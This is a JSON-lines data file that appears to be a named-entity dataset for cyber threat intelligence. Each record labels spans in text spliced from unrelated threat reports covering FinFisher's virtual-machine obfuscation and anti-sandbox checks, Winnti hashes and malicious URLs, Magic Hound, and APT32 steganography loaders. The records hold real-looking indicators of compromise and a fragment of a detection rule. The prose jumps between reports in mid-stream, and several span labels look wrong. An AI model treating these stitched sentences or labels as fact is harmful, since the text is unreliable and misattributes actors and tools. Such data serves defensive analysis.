company was going to purchase NSO Group , an infamous Israeli maker of the Pegasus spyware .", "spans": [{"start": 458, "end": 473, "label": "System"}, {"start": 803, "end": 807, "label": "Organization"}, {"start": 839, "end": 863, "label": "Indicator"}, {"start": 866, "end": 890, "label": "Indicator"}, {"start": 908, "end": 923, "label": "Indicator"}, {"start": 950, "end": 965, "label": "Indicator"}, {"start": 968, "end": 996, "label": "Organization"}, {"start": 1044, "end": 1058, "label": "Organization"}, {"start": 1081, "end": 1090, "label": "Organization"}, {"start": 1122, "end": 1141, "label": "Malware"}]} {"text": "EXEC Execute machine code and branch 0xF JBE Jump if below or equal or Jump if not above 0x10 SHL Shift left the internal value the number of times specified into the opcodes 0x11 JA Jump if above/Jump if not below or equal 0x12 MOV Move the internal VM value into a register 0x13 JZ JMP if zero 0x14 ADD Add an immediate value to the internal Vm descriptor 0x15 JB Jump if below ( unsigned ) 0x16 JS Jump if signed 0x17 EXEC Execute Between August and November 2015 the malware author creates several new versions of Emissary , specifically 5.0 , 5.1 , 5.3 and 5.4 in a much more rapid succession compared to development process in earlier versions . 
Compromised file samples ( Win32/HackedApp.Winnti.A and B ) mac-555549440ea0d64e96bb34428e08cc8d948b40e7", "spans": [{"start": 518, "end": 526, "label": "System"}, {"start": 679, "end": 709, "label": "Indicator"}, {"start": 712, "end": 756, "label": "Malware"}]} {"text": "machine code ( same as opcode 0x0 ) 0x18 JGE Jump if greater or equal/Jump if not less 0x19 DEREF Write a register value into a dereferenced pointer 0x1A JMP Special obfuscated \u201c Jump if below \u201d opcode 0x1B * Resolve a pointer 0x1C LOAD Load a value into the internal VM descriptor 0x1D JNE Jump if not equal/Jump if not zero 0x1E CALL Call an external function or a function located in the dropper 0x1F MOV Version 2.0 received one update in October 2013 before the malware author released version 3.0 in December 2014 . Winnti : 7cf41b1acfb05064518a2ad9e4c16fde9185cd4b Tue Nov 13 10:12:58 2018 1729131071 8272c1f4 . Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": [{"start": 522, "end": 528, "label": "Organization"}, {"start": 531, "end": 571, "label": "Indicator"}, {"start": 653, "end": 658, "label": "Organization"}, {"start": 674, "end": 688, "label": "System"}]} {"text": "Move the value of a register into the VM descriptor 0x20 JNB Jump if not below/Jump if above or equal/Jump if not carry 0x21 JNP Jump if not parity/Jump if parity odd Each virtual instruction is stored in a special data structure that contains all the information needed to be properly read and executed by the VM . While this may be coincidental , the out-of-sequence version 3.0 sample was created ten days after we published the Operation Lotus Blossom paper that exposed the Elise Trojan that is closely related to Emissary . Winnti : 7f73def251fcc34cbd6f5ac61822913479124a2a Wed Nov 14 03:50:18 2018 19317120 44260a1d . 
Harrison signed his threatening missive with the salutation , \u201c We are legion , \u201d suggesting that whatever comeuppance he had in store for Ashley Madison would come from a variety of directions and anonymous hackers .", "spans": [{"start": 479, "end": 491, "label": "System"}, {"start": 519, "end": 527, "label": "System"}, {"start": 530, "end": 536, "label": "Organization"}, {"start": 539, "end": 579, "label": "Indicator"}, {"start": 625, "end": 633, "label": "Organization"}, {"start": 764, "end": 778, "label": "Organization"}]} {"text": "This data structure is 24 bytes and is composed of some fixed fields and a variable portion that depends on the opcode . The Lotus Blossom largely targets military or government , with some cases of higher education and high tech companies . Winnti : dac0bd8972f23c9b5f7f8f06c5d629eac7926269 Tue Nov 27 03:05:16 2018 1729131071 8272c1f4 . According to Kaspersky telemetry , targeted organizations included think tanks and individuals working in various areas related to security and geopolitics .", "spans": [{"start": 125, "end": 138, "label": "Organization"}, {"start": 155, "end": 163, "label": "Organization"}, {"start": 167, "end": 177, "label": "Organization"}, {"start": 199, "end": 215, "label": "Organization"}, {"start": 220, "end": 239, "label": "Organization"}, {"start": 242, "end": 248, "label": "Organization"}, {"start": 251, "end": 291, "label": "Indicator"}, {"start": 352, "end": 361, "label": "Organization"}, {"start": 406, "end": 417, "label": "Organization"}, {"start": 422, "end": 494, "label": "Organization"}]} {"text": "Before interpreting the opcode , the VM decrypts the opcode \u2019 s content ( through a simple XOR algorithm ) , which it then relocates ( if needed ) , using the relocation fields . The use of Emissary appears to be focused only on Taiwan and Hong Kong , with regular malware updates to avoid detection and to increase the odds of success . 
Some hashes were redacted per request from one of the vendor . A cybercriminal may be impersonating a legitimate external user by using a Man in the Middle MiTM attack ,", "spans": [{"start": 190, "end": 198, "label": "System"}, {"start": 403, "end": 416, "label": "Organization"}]} {"text": "Here is an approximate diagram of the opcode data structure : Figure 5 . The Lotus Blossom actors using Emissary have been active for at least seven years in Southeast Asia . If for a particular reason you need them , reach out to us at threatintel@eset.com . Also , ideology as a motivator could mean your group is the target of nation states .", "spans": [{"start": 77, "end": 97, "label": "Organization"}, {"start": 104, "end": 112, "label": "System"}, {"start": 307, "end": 312, "label": "Organization"}, {"start": 330, "end": 343, "label": "Organization"}]} {"text": "A graphical representation of the data structure used to store each VM opcode The VM handler is completely able to generate different code blocks and deal with relocated code due to address space layout randomization ( ASLR ) . Magic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . Payload Samples ( Win32/Winnti.AG ) Surprisingly enough , it does not take very long to get some information about Hack520 : someone with this handle runs a blog and a Twitter account ( with a handle close to Hack520 ) that is also directly linked to the blog .", "spans": [{"start": 284, "end": 290, "label": "Organization"}, {"start": 293, "end": 303, "label": "Organization"}, {"start": 310, "end": 328, "label": "Organization"}, {"start": 414, "end": 429, "label": "Indicator"}, {"start": 511, "end": 518, "label": "Organization"}, {"start": 564, "end": 571, "label": "System"}, {"start": 605, "end": 612, "label": "Organization"}]} {"text": "It is also able to move code execution into different locations if needed . 
Regardless of causation , the rapid development of new versions of Emissary suggests that the malware authors are making frequent modifications to evade detection , which as a corollary suggests the Lotus Blossom are actively using the Emissary Trojan as a payload in attacks . Winnti : a045939f53c5ad2c0f7368b082aa7b0bd7b116da https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php . Since early 2023 , we have seen several new Yashma strains emerge , including ANXZ , Sirattacker , and Shadow Men Team .", "spans": [{"start": 143, "end": 151, "label": "System"}, {"start": 275, "end": 288, "label": "Organization"}, {"start": 312, "end": 327, "label": "System"}, {"start": 354, "end": 360, "label": "Organization"}, {"start": 363, "end": 403, "label": "Indicator"}, {"start": 404, "end": 467, "label": "Indicator"}, {"start": 548, "end": 552, "label": "Organization"}, {"start": 555, "end": 566, "label": "Organization"}, {"start": 573, "end": 588, "label": "Organization"}]} {"text": "For instance , in the case of the \u201c Execute \u201d opcode ( 0x17 ) , the 32-bit code to run is stored entirely into the variable section with the value at offset 5 specifying the number of bytes to be copied and executed . Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called \" Rocket Kitten \" ( AKA Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish ) as well as an older attack campaign called Newscasters . Winnti : a260dcf193e747cee49ae83568eea6c04bf93cb3 https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php . 
DDoS and MiTM Attacks Any anomalous increase in traffic or redirect through unrecognized external servers can be an indication of a cyberattack that s about to happen .", "spans": [{"start": 337, "end": 342, "label": "Organization"}, {"start": 352, "end": 365, "label": "Organization"}, {"start": 374, "end": 396, "label": "Organization"}, {"start": 399, "end": 417, "label": "Organization"}, {"start": 420, "end": 445, "label": "Organization"}, {"start": 505, "end": 511, "label": "Organization"}, {"start": 514, "end": 554, "label": "Indicator"}, {"start": 555, "end": 621, "label": "Indicator"}, {"start": 646, "end": 729, "label": "Indicator"}]} {"text": "Otherwise , in the case of conditional opcodes , the variable part can contain the next JIT packet ID or the next relative virtual address ( RVA ) where code execution should continue . In addition to the malware evolution , the actors also shifted from solely spear-phishing targets with attachments to also compromising legitimate websites to host malware . Winnti : dde82093decde6371eb852a5e9a1aa4acf3b56ba https://bugcheck.xigncodeservice.com/Common/Lib/common.php . LockBit reportedly squeezed about $ 91 million out of US organizations with around 1,700 attacks since 2020 , according to a June report by CISA .", "spans": [{"start": 229, "end": 235, "label": "Organization"}, {"start": 360, "end": 366, "label": "Organization"}, {"start": 369, "end": 409, "label": "Indicator"}, {"start": 410, "end": 468, "label": "Indicator"}, {"start": 471, "end": 478, "label": "Organization"}, {"start": 525, "end": 541, "label": "Organization"}, {"start": 611, "end": 615, "label": "Organization"}]} {"text": "Of course , not all the opcodes are can be easily read and understood due to additional steps that the authors have taken to make analysis extremely complicated . It is highly likely the Lotus Blossom used spear-phishing attacks containing links to these malicious documents as a delivery mechanism . 
Winnti : 8272c1f41f7c223316c0d78bd3bd5744e25c2e9f https://nw.infestexe.com/version/last.php . By understanding the TTPs of the leaked source codes , defenders will gain invaluable insights that are helpful in identifying and mitigating any existing security weakness in their environment and improving their security defense against these attack vectors .", "spans": [{"start": 187, "end": 200, "label": "Organization"}, {"start": 301, "end": 307, "label": "Organization"}, {"start": 310, "end": 350, "label": "Indicator"}, {"start": 351, "end": 392, "label": "Indicator"}]} {"text": "For example , this is how opcode 0x1A is implemented : The opcode should represent a JB ( Jump if below ) function , but it \u2019 s implemented through set carry ( STC ) instruction followed by a JMP into the dispatcher code that will verify the carry flag condition set by STC . We were ultimately able to identify multiple organizations in the government , energy , and technology sectors targeted by Magic Hound . Winnti : 44260a1dfd92922a621124640015160e621f32d5 https://dump.gxxservice.com/common/up/up_base.php . Another wave of suspected Dukes attacks was identified in November 2018 by FireEye , this time again relying on Windows LNK files and deploying Cobalt Strike .", "spans": [{"start": 342, "end": 352, "label": "Organization"}, {"start": 355, "end": 361, "label": "Organization"}, {"start": 368, "end": 386, "label": "Organization"}, {"start": 413, "end": 419, "label": "Organization"}, {"start": 422, "end": 462, "label": "Indicator"}, {"start": 463, "end": 512, "label": "Indicator"}, {"start": 541, "end": 554, "label": "Organization"}, {"start": 590, "end": 597, "label": "Organization"}, {"start": 627, "end": 644, "label": "Indicator"}, {"start": 659, "end": 672, "label": "System"}]} {"text": "Figure 6 . The Magic Hound attacks did not rely on exploit code to compromise targeted systems , instead relying on Excel and Word documents containing malicious macros . 
Second stage samples ( Win64/Winnti.BN ) A clever example was \u2018 Office Monkeys LOL Video.zip \u2019 .", "spans": [{"start": 194, "end": 209, "label": "Indicator"}, {"start": 235, "end": 263, "label": "Indicator"}]} {"text": "One of the obfuscation tricks included by the malware authors in a VM opcode dispatcher Even armed with the knowledge we have described so far , it still took us many hours to write a full-fledged opcode interpreter that \u2019 s able to reconstruct the real code executed by FinFisher . The MPK bot is not publicly available and had previously been attributed to an adversary group called \" Rocket Kitten \" which has often been thought to be a state sponsored adversary operating in the Middle East region . Winnti : Dropper delivered by api.goallbandungtravel.com . Sandworm potentially developed the disruptive capability as early as three weeks prior to the OT event , suggesting the attacker may have been waiting for a specific moment to deploy the capability .", "spans": [{"start": 271, "end": 280, "label": "Malware"}, {"start": 287, "end": 294, "label": "System"}, {"start": 372, "end": 377, "label": "Organization"}, {"start": 387, "end": 400, "label": "Organization"}, {"start": 504, "end": 510, "label": "Organization"}, {"start": 534, "end": 560, "label": "Indicator"}, {"start": 563, "end": 571, "label": "Organization"}, {"start": 657, "end": 659, "label": "System"}]} {"text": "Stage 1 : Loader malware keeps sandbox and debuggers away The first stage of FinFisher running through this complicated virtual machine is a loader malware designed to probe the system and determine whether it \u2019 s running in a sandbox environment ( typical for cloud-based detonation solution like Office 365 ATP ) . One payload was a Python based open source remote administration tool ( RAT ) called Pupy . Winnti : 4256fa6f6a39add6a1fa10ef1497a74088f12be0 2018-07-25 10:13:41 None . 
According to Kaspersky telemetry , targeted organizations included political bodies in Europe .", "spans": [{"start": 77, "end": 86, "label": "Malware"}, {"start": 298, "end": 312, "label": "System"}, {"start": 389, "end": 392, "label": "System"}, {"start": 402, "end": 406, "label": "System"}, {"start": 409, "end": 415, "label": "Organization"}, {"start": 418, "end": 458, "label": "Indicator"}, {"start": 499, "end": 508, "label": "Organization"}, {"start": 553, "end": 569, "label": "Organization"}]} {"text": "The loader first dynamically rebuilds a simple import address table ( IAT ) , resolving all the API needed from Kernel32 and NtDll libraries . The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method , specifically attempting to load MagicHound.Rollover . Winnti : bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81 2018-10-10 09:57:31 http://checkin.travelsanignacio.com . Developed in - house using C++ , the NoEscape ransomware uses a hybrid approach to encryption , combining ChaCha20 and RSA encryption algorithms for file encryption and key protection .", "spans": [{"start": 281, "end": 300, "label": "System"}, {"start": 303, "end": 309, "label": "Organization"}, {"start": 312, "end": 352, "label": "Indicator"}, {"start": 373, "end": 408, "label": "Indicator"}, {"start": 448, "end": 467, "label": "Malware"}]} {"text": "It then continues executing in a spawned new thread that checks if there are additional undesired modules inside its own virtual address space ( for example , modules injected by certain security solutions ) . Many of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES . Winnti : T1195 Supply Chain Compromise . 
Someone motivated by money will likely cast a wide net and look for easy targets .", "spans": [{"start": 334, "end": 337, "label": "System"}, {"start": 340, "end": 346, "label": "Organization"}]} {"text": "It eventually kills all threads that belong to these undesired modules ( using ZwQueryInformationThread native API with ThreadQuerySetWin32StartAddress information class ) . The loader 's main goal was to run a PowerShell command to execute shellcode . Winnti : T1050 New Service . The script contains 1,759 lines of code .", "spans": [{"start": 211, "end": 229, "label": "System"}, {"start": 253, "end": 259, "label": "Organization"}, {"start": 282, "end": 321, "label": "Malware"}]} {"text": "The first anti-sandbox technique is the loader checking the code segment . To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys . Winnti : T1022 Data Encrypted . Another finding in the activity of ' Sharpshooter ' were a set of unobfuscated connections from IP addresses in Windhoek , a city in Namibia , Africa .", "spans": [{"start": 129, "end": 143, "label": "Malware"}, {"start": 202, "end": 231, "label": "Malware"}, {"start": 234, "end": 240, "label": "Organization"}, {"start": 332, "end": 374, "label": "Indicator"}]} {"text": "If it \u2019 s not 0x1B ( for 32-bit systems ) or 0x23 ( for 32-bit system under Wow64 ) , the loader exits . The Magic Hound campaign was also discovered using a custom dropper tool , which we have named MagicHound.DropIt . Winnti : T1079 Multilayer Encryption . \u201c lun.vbs \u201d , which runs n.bat", "spans": [{"start": 158, "end": 172, "label": "System"}, {"start": 200, "end": 217, "label": "Malware"}, {"start": 220, "end": 226, "label": "Organization"}, {"start": 259, "end": 289, "label": "Indicator"}]} {"text": "Next , the dropper checks its own parent process for indications that it is running in a sandbox setup . 
We have also seen Magic Hound using DropIt as a binder , specifically dropping a legitimate decoy executable along with the malicious executable onto the target host . Winnti : T1032 Standard Cryptographic Protocol ( RC4 , RC5 ) . title : MicroSCADA SCILC Command Execution description : Identification of Events or Host Commands that are related to the MicroSCADA SCILC programming language and specifically command execution author : Mandiant date : 2023/02/27 logsource : product : windows service : security detection : selection : NewProcessName|endswith : - \\scilc.exe CommandLine|contains : -", "spans": [{"start": 141, "end": 147, "label": "System"}, {"start": 273, "end": 279, "label": "Organization"}, {"start": 393, "end": 531, "label": "Indicator"}, {"start": 541, "end": 549, "label": "Organization"}]} {"text": "It calculates the MD5 hash of the lower-case process image name and terminates if one of the following conditions are met : The MD5 hash of the parent process image name is either D0C4DBFA1F3962AED583F6FCE666F8BC or 3CE30F5FED4C67053379518EACFCF879 The parent process \u2019 s full image path is equal to its own process path If these initial checks are passed , the loader builds a complete IAT by reading four imported libraries from disk ( ntdll.dll We also found a second IRC bot called MPK using the same IP for its C2 server that a Leash sample was hosted on . Winnti : T1043 Commonly Used Port ( 80 , 443 ) . 
Users were drawn to a login prompt that was designed to harvest user credentials with pages that looked like Adobe , Microsoft , etc .", "spans": [{"start": 180, "end": 212, "label": "Indicator"}, {"start": 216, "end": 248, "label": "Indicator"}, {"start": 438, "end": 447, "label": "Indicator"}, {"start": 471, "end": 478, "label": "System"}, {"start": 486, "end": 489, "label": "System"}, {"start": 533, "end": 545, "label": "System"}, {"start": 562, "end": 568, "label": "Organization"}, {"start": 720, "end": 725, "label": "System"}, {"start": 728, "end": 737, "label": "System"}]} {"text": ", kernel32.dll , advapi32.dll , and version.dll ) and remapping them in memory . The Magic Hound attack campaign is an active and persistent espionage motivated adversary operating in the Middle East region . OceanLotus Steganography Malware Analysis White Paper . Eventually , when the DLL is copied into its final path , rundll32.exe is used to call the exported function SetQueryNetSessionCount , which downloads the next stage .", "spans": [{"start": 2, "end": 14, "label": "Indicator"}, {"start": 17, "end": 29, "label": "Indicator"}, {"start": 36, "end": 47, "label": "Indicator"}, {"start": 141, "end": 150, "label": "Organization"}, {"start": 209, "end": 219, "label": "Organization"}, {"start": 287, "end": 290, "label": "Malware"}, {"start": 323, "end": 335, "label": "Indicator"}]} {"text": "This technique makes use of debuggers and software breakpoints useless . Organizations in the government , energy , and technology sectors have been targeted by Magic Hound , specifically organizations based in or doing business in Saudi Arabia . While continuing to monitor activity of the OceanLotus APT Group , BlackBerry Cylance researchers uncovered a novel payload loader that utilizes steganography to read an encrypted payload concealed within a .png image file . 
An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": [{"start": 94, "end": 104, "label": "Organization"}, {"start": 107, "end": 113, "label": "Organization"}, {"start": 120, "end": 138, "label": "Organization"}, {"start": 291, "end": 301, "label": "Organization"}, {"start": 314, "end": 332, "label": "Organization"}, {"start": 525, "end": 744, "label": "Malware"}]} {"text": "During this stage , the loader may also call a certain API using native system calls , which is another way to bypass breakpoints on API and security solutions using hooks . At a high level , Retriever is a .NET downloader that downloads secondary payloads from servers associated with Magic Hound . The steganography algorithm appears to be bespoke and utilizes a least significant bit approach to minimize visual differences when compared with the original image to prevent analysis by discovery tools . \" VP Labs RD and Deputy CSO at LogRhythm .", "spans": [{"start": 192, "end": 201, "label": "System"}, {"start": 207, "end": 222, "label": "System"}, {"start": 508, "end": 546, "label": "Organization"}]} {"text": "Figure 7 . For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer . Once decoded , decrypted , and executed , an obfuscated loader will load one of the APT32 backdoors . 
They also added a new user for persistence and used the Wput tool to exfiltrate the victims files to their own FTP server .", "spans": [{"start": 39, "end": 52, "label": "System"}, {"start": 136, "end": 159, "label": "Malware"}, {"start": 190, "end": 213, "label": "Malware"}, {"start": 238, "end": 260, "label": "System"}, {"start": 347, "end": 352, "label": "Organization"}, {"start": 421, "end": 425, "label": "System"}]} {"text": "FinFisher loader calling native Windows API to perform anti-debugging tricks At this point , the fun in analysis is not over . M-Trends 2018 can arm security teams with the knowledge they need to defend against today 's most often used cyber attacks , as well as lesser seen and emerging threats . Thus far , BlackBerry Cylance has observed two backdoors being used in combination with the steganography loader \u2013 a version of Denes backdoor ( bearing similarities to the one described by ESET ) , and an updated version of Remy backdoor . PREDATOR is intended to work with another spyware component called \u201c ALIEN \u201d ( it \u2019s not \u201c Alien vs. 
Predator \u201d this time ; they \u2019re working together ) .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 32, "end": 39, "label": "System"}, {"start": 127, "end": 135, "label": "Organization"}, {"start": 309, "end": 327, "label": "Organization"}, {"start": 426, "end": 440, "label": "Malware"}, {"start": 488, "end": 492, "label": "Organization"}, {"start": 523, "end": 536, "label": "Malware"}, {"start": 539, "end": 547, "label": "Malware"}, {"start": 608, "end": 613, "label": "Malware"}, {"start": 630, "end": 635, "label": "Malware"}, {"start": 640, "end": 648, "label": "Malware"}]} {"text": "A lot of additional anti-sandbox checks are performed in this exact order : Check that the malware is not executed under the root folder of a drive Check that the malware file is readable from an external source Check that the hash of base path is not 3D6D62AF1A7C8053DBC8E110A530C679 Check that the full malware path contains only human readable characters ( \u201c a-z \u201d , \u201c A-Z \u201d , and \u201c 0-9 \u201d ) Check that no node in the full path contains the MD5 string of the malware FireEye tracks thousands of threat actors , but pays special attention to state-sponsored attackers who carry out advanced persistent threat ( APT ) attacks . However , this can be easily modified by the threat actor to deliver other malicious payloads . 
Adversaries may also use CLIs to install and run new software , including malicious tools that may be installed over the course of an operation .", "spans": [{"start": 252, "end": 284, "label": "Indicator"}, {"start": 469, "end": 476, "label": "Organization"}, {"start": 497, "end": 510, "label": "Organization"}, {"start": 559, "end": 568, "label": "Organization"}, {"start": 612, "end": 615, "label": "Organization"}]} {"text": "file Fingerprint the system and check the following registry values : HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid should not be \u201c 6ba1d002-21ed-4dbe-afb5-08cf8b81ca32 \u201d HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\DigitalProductId should not be \u201c 55274-649-6478953-23109 \u201d , \u201c A22-00001 \u201d , or \u201c 47220 \u201d HARDWARE\\Description\\System\\SystemBiosDate should not contain \u201c 01/02/03 \u201d Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents . The complexity of the shellcode and loaders shows the group continues to invest heavily in development of bespoke tooling . 
Mandiant directly observed one ( 1 ) variant of STRATOFEAR as a Mach - O executable compiled for ARM64 systems that contained a self - signed certificate with a particular Common Name ( CN ) .", "spans": [{"start": 70, "end": 118, "label": "Indicator"}, {"start": 135, "end": 171, "label": "Indicator"}, {"start": 174, "end": 240, "label": "Indicator"}, {"start": 257, "end": 280, "label": "Indicator"}, {"start": 287, "end": 296, "label": "Indicator"}, {"start": 306, "end": 311, "label": "Indicator"}, {"start": 314, "end": 356, "label": "Indicator"}, {"start": 411, "end": 416, "label": "Organization"}, {"start": 437, "end": 453, "label": "Organization"}, {"start": 469, "end": 489, "label": "Organization"}, {"start": 520, "end": 539, "label": "Organization"}, {"start": 542, "end": 553, "label": "Organization"}, {"start": 571, "end": 581, "label": "Organization"}, {"start": 805, "end": 818, "label": "System"}]} {"text": "Check that the mutex WininetStartupMutex0 does not already exist Check that no DLL whose base name has hash value of 0xC9CEF3E4 is mapped into the malware address space The hashes in these checks are most likely correspond to sandbox or security products that the FinFisher authors want to avoid . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . This white paper describes the steganography algorithm used in two distinct loader variants and looks at the launcher of the backdoor that was encoded in one of the .png cover images . 
mcvsocfg.dll : In April , Talos discovered a new ransomware actor , RA Group , conducting double extortion attacks using their ransomware variant based on leaked Babuk source code .", "spans": [{"start": 117, "end": 127, "label": "Indicator"}, {"start": 264, "end": 273, "label": "Malware"}, {"start": 325, "end": 330, "label": "Organization"}, {"start": 372, "end": 397, "label": "Malware"}, {"start": 625, "end": 637, "label": "Indicator"}, {"start": 651, "end": 656, "label": "Organization"}, {"start": 693, "end": 701, "label": "Organization"}, {"start": 787, "end": 804, "label": "Malware"}]} {"text": "Next , the loader checks that it \u2019 s not running in a virtualized environment ( VMWare or Hyper-V ) or under a debugger . Evidence also suggests that APT32 has targeted network security and technology infrastructure corporations with connections to foreign investors . ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 Malware/Backdoor 659 KB ( 674 , 816 bytes ) PE32 executable for MS Windows ( DLL ) ( console ) Intel 80386 32-bit September 2018 . Getting access to the C2 information helped the researchers get a clear view of the attacker 's operations and utilities .", "spans": [{"start": 80, "end": 86, "label": "System"}, {"start": 90, "end": 97, "label": "System"}, {"start": 150, "end": 155, "label": "Organization"}, {"start": 169, "end": 185, "label": "Organization"}, {"start": 190, "end": 228, "label": "Organization"}, {"start": 269, "end": 333, "label": "Indicator"}, {"start": 401, "end": 408, "label": "System"}, {"start": 411, "end": 414, "label": "System"}, {"start": 429, "end": 434, "label": "Organization"}, {"start": 487, "end": 489, "label": "System"}]} {"text": "For the hardware virtualization check , the loader obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations foreign governments . 
This particular OceanLotus malware loader attempts to imitate McAfee \u2019s McVsoCfg DLL and expects to be side-loaded by the legitimate \" On Demand Scanner \" executable . Seven of the vulnerabilities included in today \u2019s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10 .", "spans": [{"start": 177, "end": 182, "label": "Organization"}, {"start": 203, "end": 219, "label": "Organization"}, {"start": 235, "end": 255, "label": "Organization"}, {"start": 264, "end": 275, "label": "Organization"}, {"start": 294, "end": 304, "label": "Organization"}, {"start": 350, "end": 362, "label": "System"}, {"start": 525, "end": 572, "label": "Indicator"}]} {"text": "In our tests , the malware sample was able to easily detect both VMWare and Hyper-V environments through the detection of the virtualized peripherals ( for example , Vmware has VEN_15AD as vendor ID , HyperV has VMBus as bus name ) . FireEye asesses that APT32 actors may be aligned with the national interests of Vietnam . It arrives together with an encrypted payload stored in a separate .png image file . Data transfer to a thirdparty tool may be authorized , but it may not be common practice to continuously ping internal servers for external data transfer requests .", "spans": [{"start": 65, "end": 71, "label": "System"}, {"start": 76, "end": 83, "label": "System"}, {"start": 166, "end": 172, "label": "Organization"}, {"start": 234, "end": 241, "label": "Organization"}, {"start": 255, "end": 267, "label": "Organization"}, {"start": 409, "end": 571, "label": "Indicator"}]} {"text": "Office 365 ATP sandbox employs special mechanisms to avoid being detected by similar checks . APT32 poses a threat to companies doing business or preparing to invest in Vietnam . The .png cover file is actually a valid image file that is not malicious on its own . 
This new ransomware variant does n't have any novel features or functionality and points to the challenges organizations are facing as the landscape continues to shift and a plethora of new actors join their ranks .", "spans": [{"start": 0, "end": 14, "label": "System"}, {"start": 94, "end": 99, "label": "Organization"}]} {"text": "The loader \u2019 s anti-debugger code is based on the following three methods : The first call aims to destroy the debugger connection : NOTE : This call completely stops the execution of WinDbg and other debuggers The second call tries to detect the presence of a debugger : The final call tries to destroy the possibility of adding software breakpoint : Finally , if the loader is happy with all the checks done so far , based on the victim operating system ( 32 or 64-bit ) it proceeds to decrypt a set of fake bitmap resources ( stage 2 We believe recent activity targeting private interests in Vietnam suggests that APT32 poses a threat to companies doing business or preparing to invest in the country . The payload is encoded inside this image with the use of a technique called steganography , which utilizes the least significant bits of each pixel\u2019s color code to store hidden information , without making overtly visible changes to the picture itself . The actor hunts for confidential information stored in the networks of governmental organizations , political groups and think tanks , as well as various individuals involved in defense and geopolitical related research .", "spans": [{"start": 617, "end": 622, "label": "Organization"}, {"start": 1031, "end": 1057, "label": "Organization"}, {"start": 1060, "end": 1076, "label": "Organization"}, {"start": 1081, "end": 1092, "label": "Organization"}, {"start": 1106, "end": 1179, "label": "Organization"}]} {"text": ") embedded in the executable and prepares the execution of a new layer of VM decoding . 
DROPSHOT is a notable piece of malware used to deliver variants of the TURNEDUP backdoor . The encoded payload is additionally encrypted with AES128 and further obfuscated with XOR in an attempt to fool steganography detection tools . Once installed , the trojan could disrupt operations within systems and networks or exfiltrate confidential data .", "spans": [{"start": 88, "end": 96, "label": "System"}, {"start": 119, "end": 126, "label": "System"}, {"start": 135, "end": 176, "label": "Malware"}, {"start": 265, "end": 268, "label": "System"}, {"start": 344, "end": 350, "label": "Malware"}]} {"text": "Each bitmap resource is extracted , stripped of the first 0x428 bytes ( BMP headers and garbage data ) , and combined into one file . Additionally , there is evidence to suggest APT33 targeted Saudi Arabia . Features : The executable within this not only played a very funny video , but dropped and ran another CozyDuke executable .", "spans": [{"start": 178, "end": 183, "label": "Organization"}]} {"text": "The block is decrypted using a customized algorithm that uses a key derived from the original malware dropper \u2019 s TimeDateStamp field multiplied by 5 . APT33 often conducts spear-phishing operations using a built-in phishing module . Side-loaded DLL Loads next-stage payload using custom .png steganography Uses AES128 implementation from Crypto++ library for payload decryption Known to load Denes backdoor , might possibly be used also with other payloads . 
Threat actors regularly adapt and make use of red team tools - such as commercial and publicly available exploitation frameworks - to facilitate real world attacks , like TEMP.Veles \u2019 use of METERPRETER during .", "spans": [{"start": 152, "end": 157, "label": "Organization"}, {"start": 246, "end": 249, "label": "System"}, {"start": 281, "end": 306, "label": "System"}, {"start": 339, "end": 355, "label": "System"}, {"start": 393, "end": 407, "label": "Malware"}, {"start": 460, "end": 473, "label": "Organization"}, {"start": 506, "end": 520, "label": "System"}, {"start": 631, "end": 641, "label": "Malware"}, {"start": 651, "end": 662, "label": "System"}]} {"text": "Figure 8 . Additionally , there is evidence to suggest APT33 targeted Saudi Arabian and Western organizations that provide training , maintenance and support for Saudi Arabia 's military and commercial fleets . The malicious DLL exports the same function names as the original mcvsocfg.dll library . HHS HC3 warned that the stolen credentials may have been used to compromise a number of healthcare organizations and enterprises in other industries .", "spans": [{"start": 55, "end": 60, "label": "Organization"}, {"start": 178, "end": 186, "label": "Organization"}, {"start": 191, "end": 201, "label": "Organization"}, {"start": 225, "end": 228, "label": "System"}, {"start": 277, "end": 289, "label": "Indicator"}, {"start": 300, "end": 307, "label": "Organization"}, {"start": 388, "end": 412, "label": "Organization"}, {"start": 417, "end": 448, "label": "Organization"}]} {"text": "The fake bitmap image embedded as resource The 32-bit stage 2 malware uses a customized loading mechanism ( i.e. , the PE file has a scrambled IAT and relocation table ) and exports only one function . Although we have only observed APT33 use DROPSHOT to deliver TURNEDUP , we have identified multiple DROPSHOT samples in the wild that delivered wiper malware we call SHAPESHIFT . 
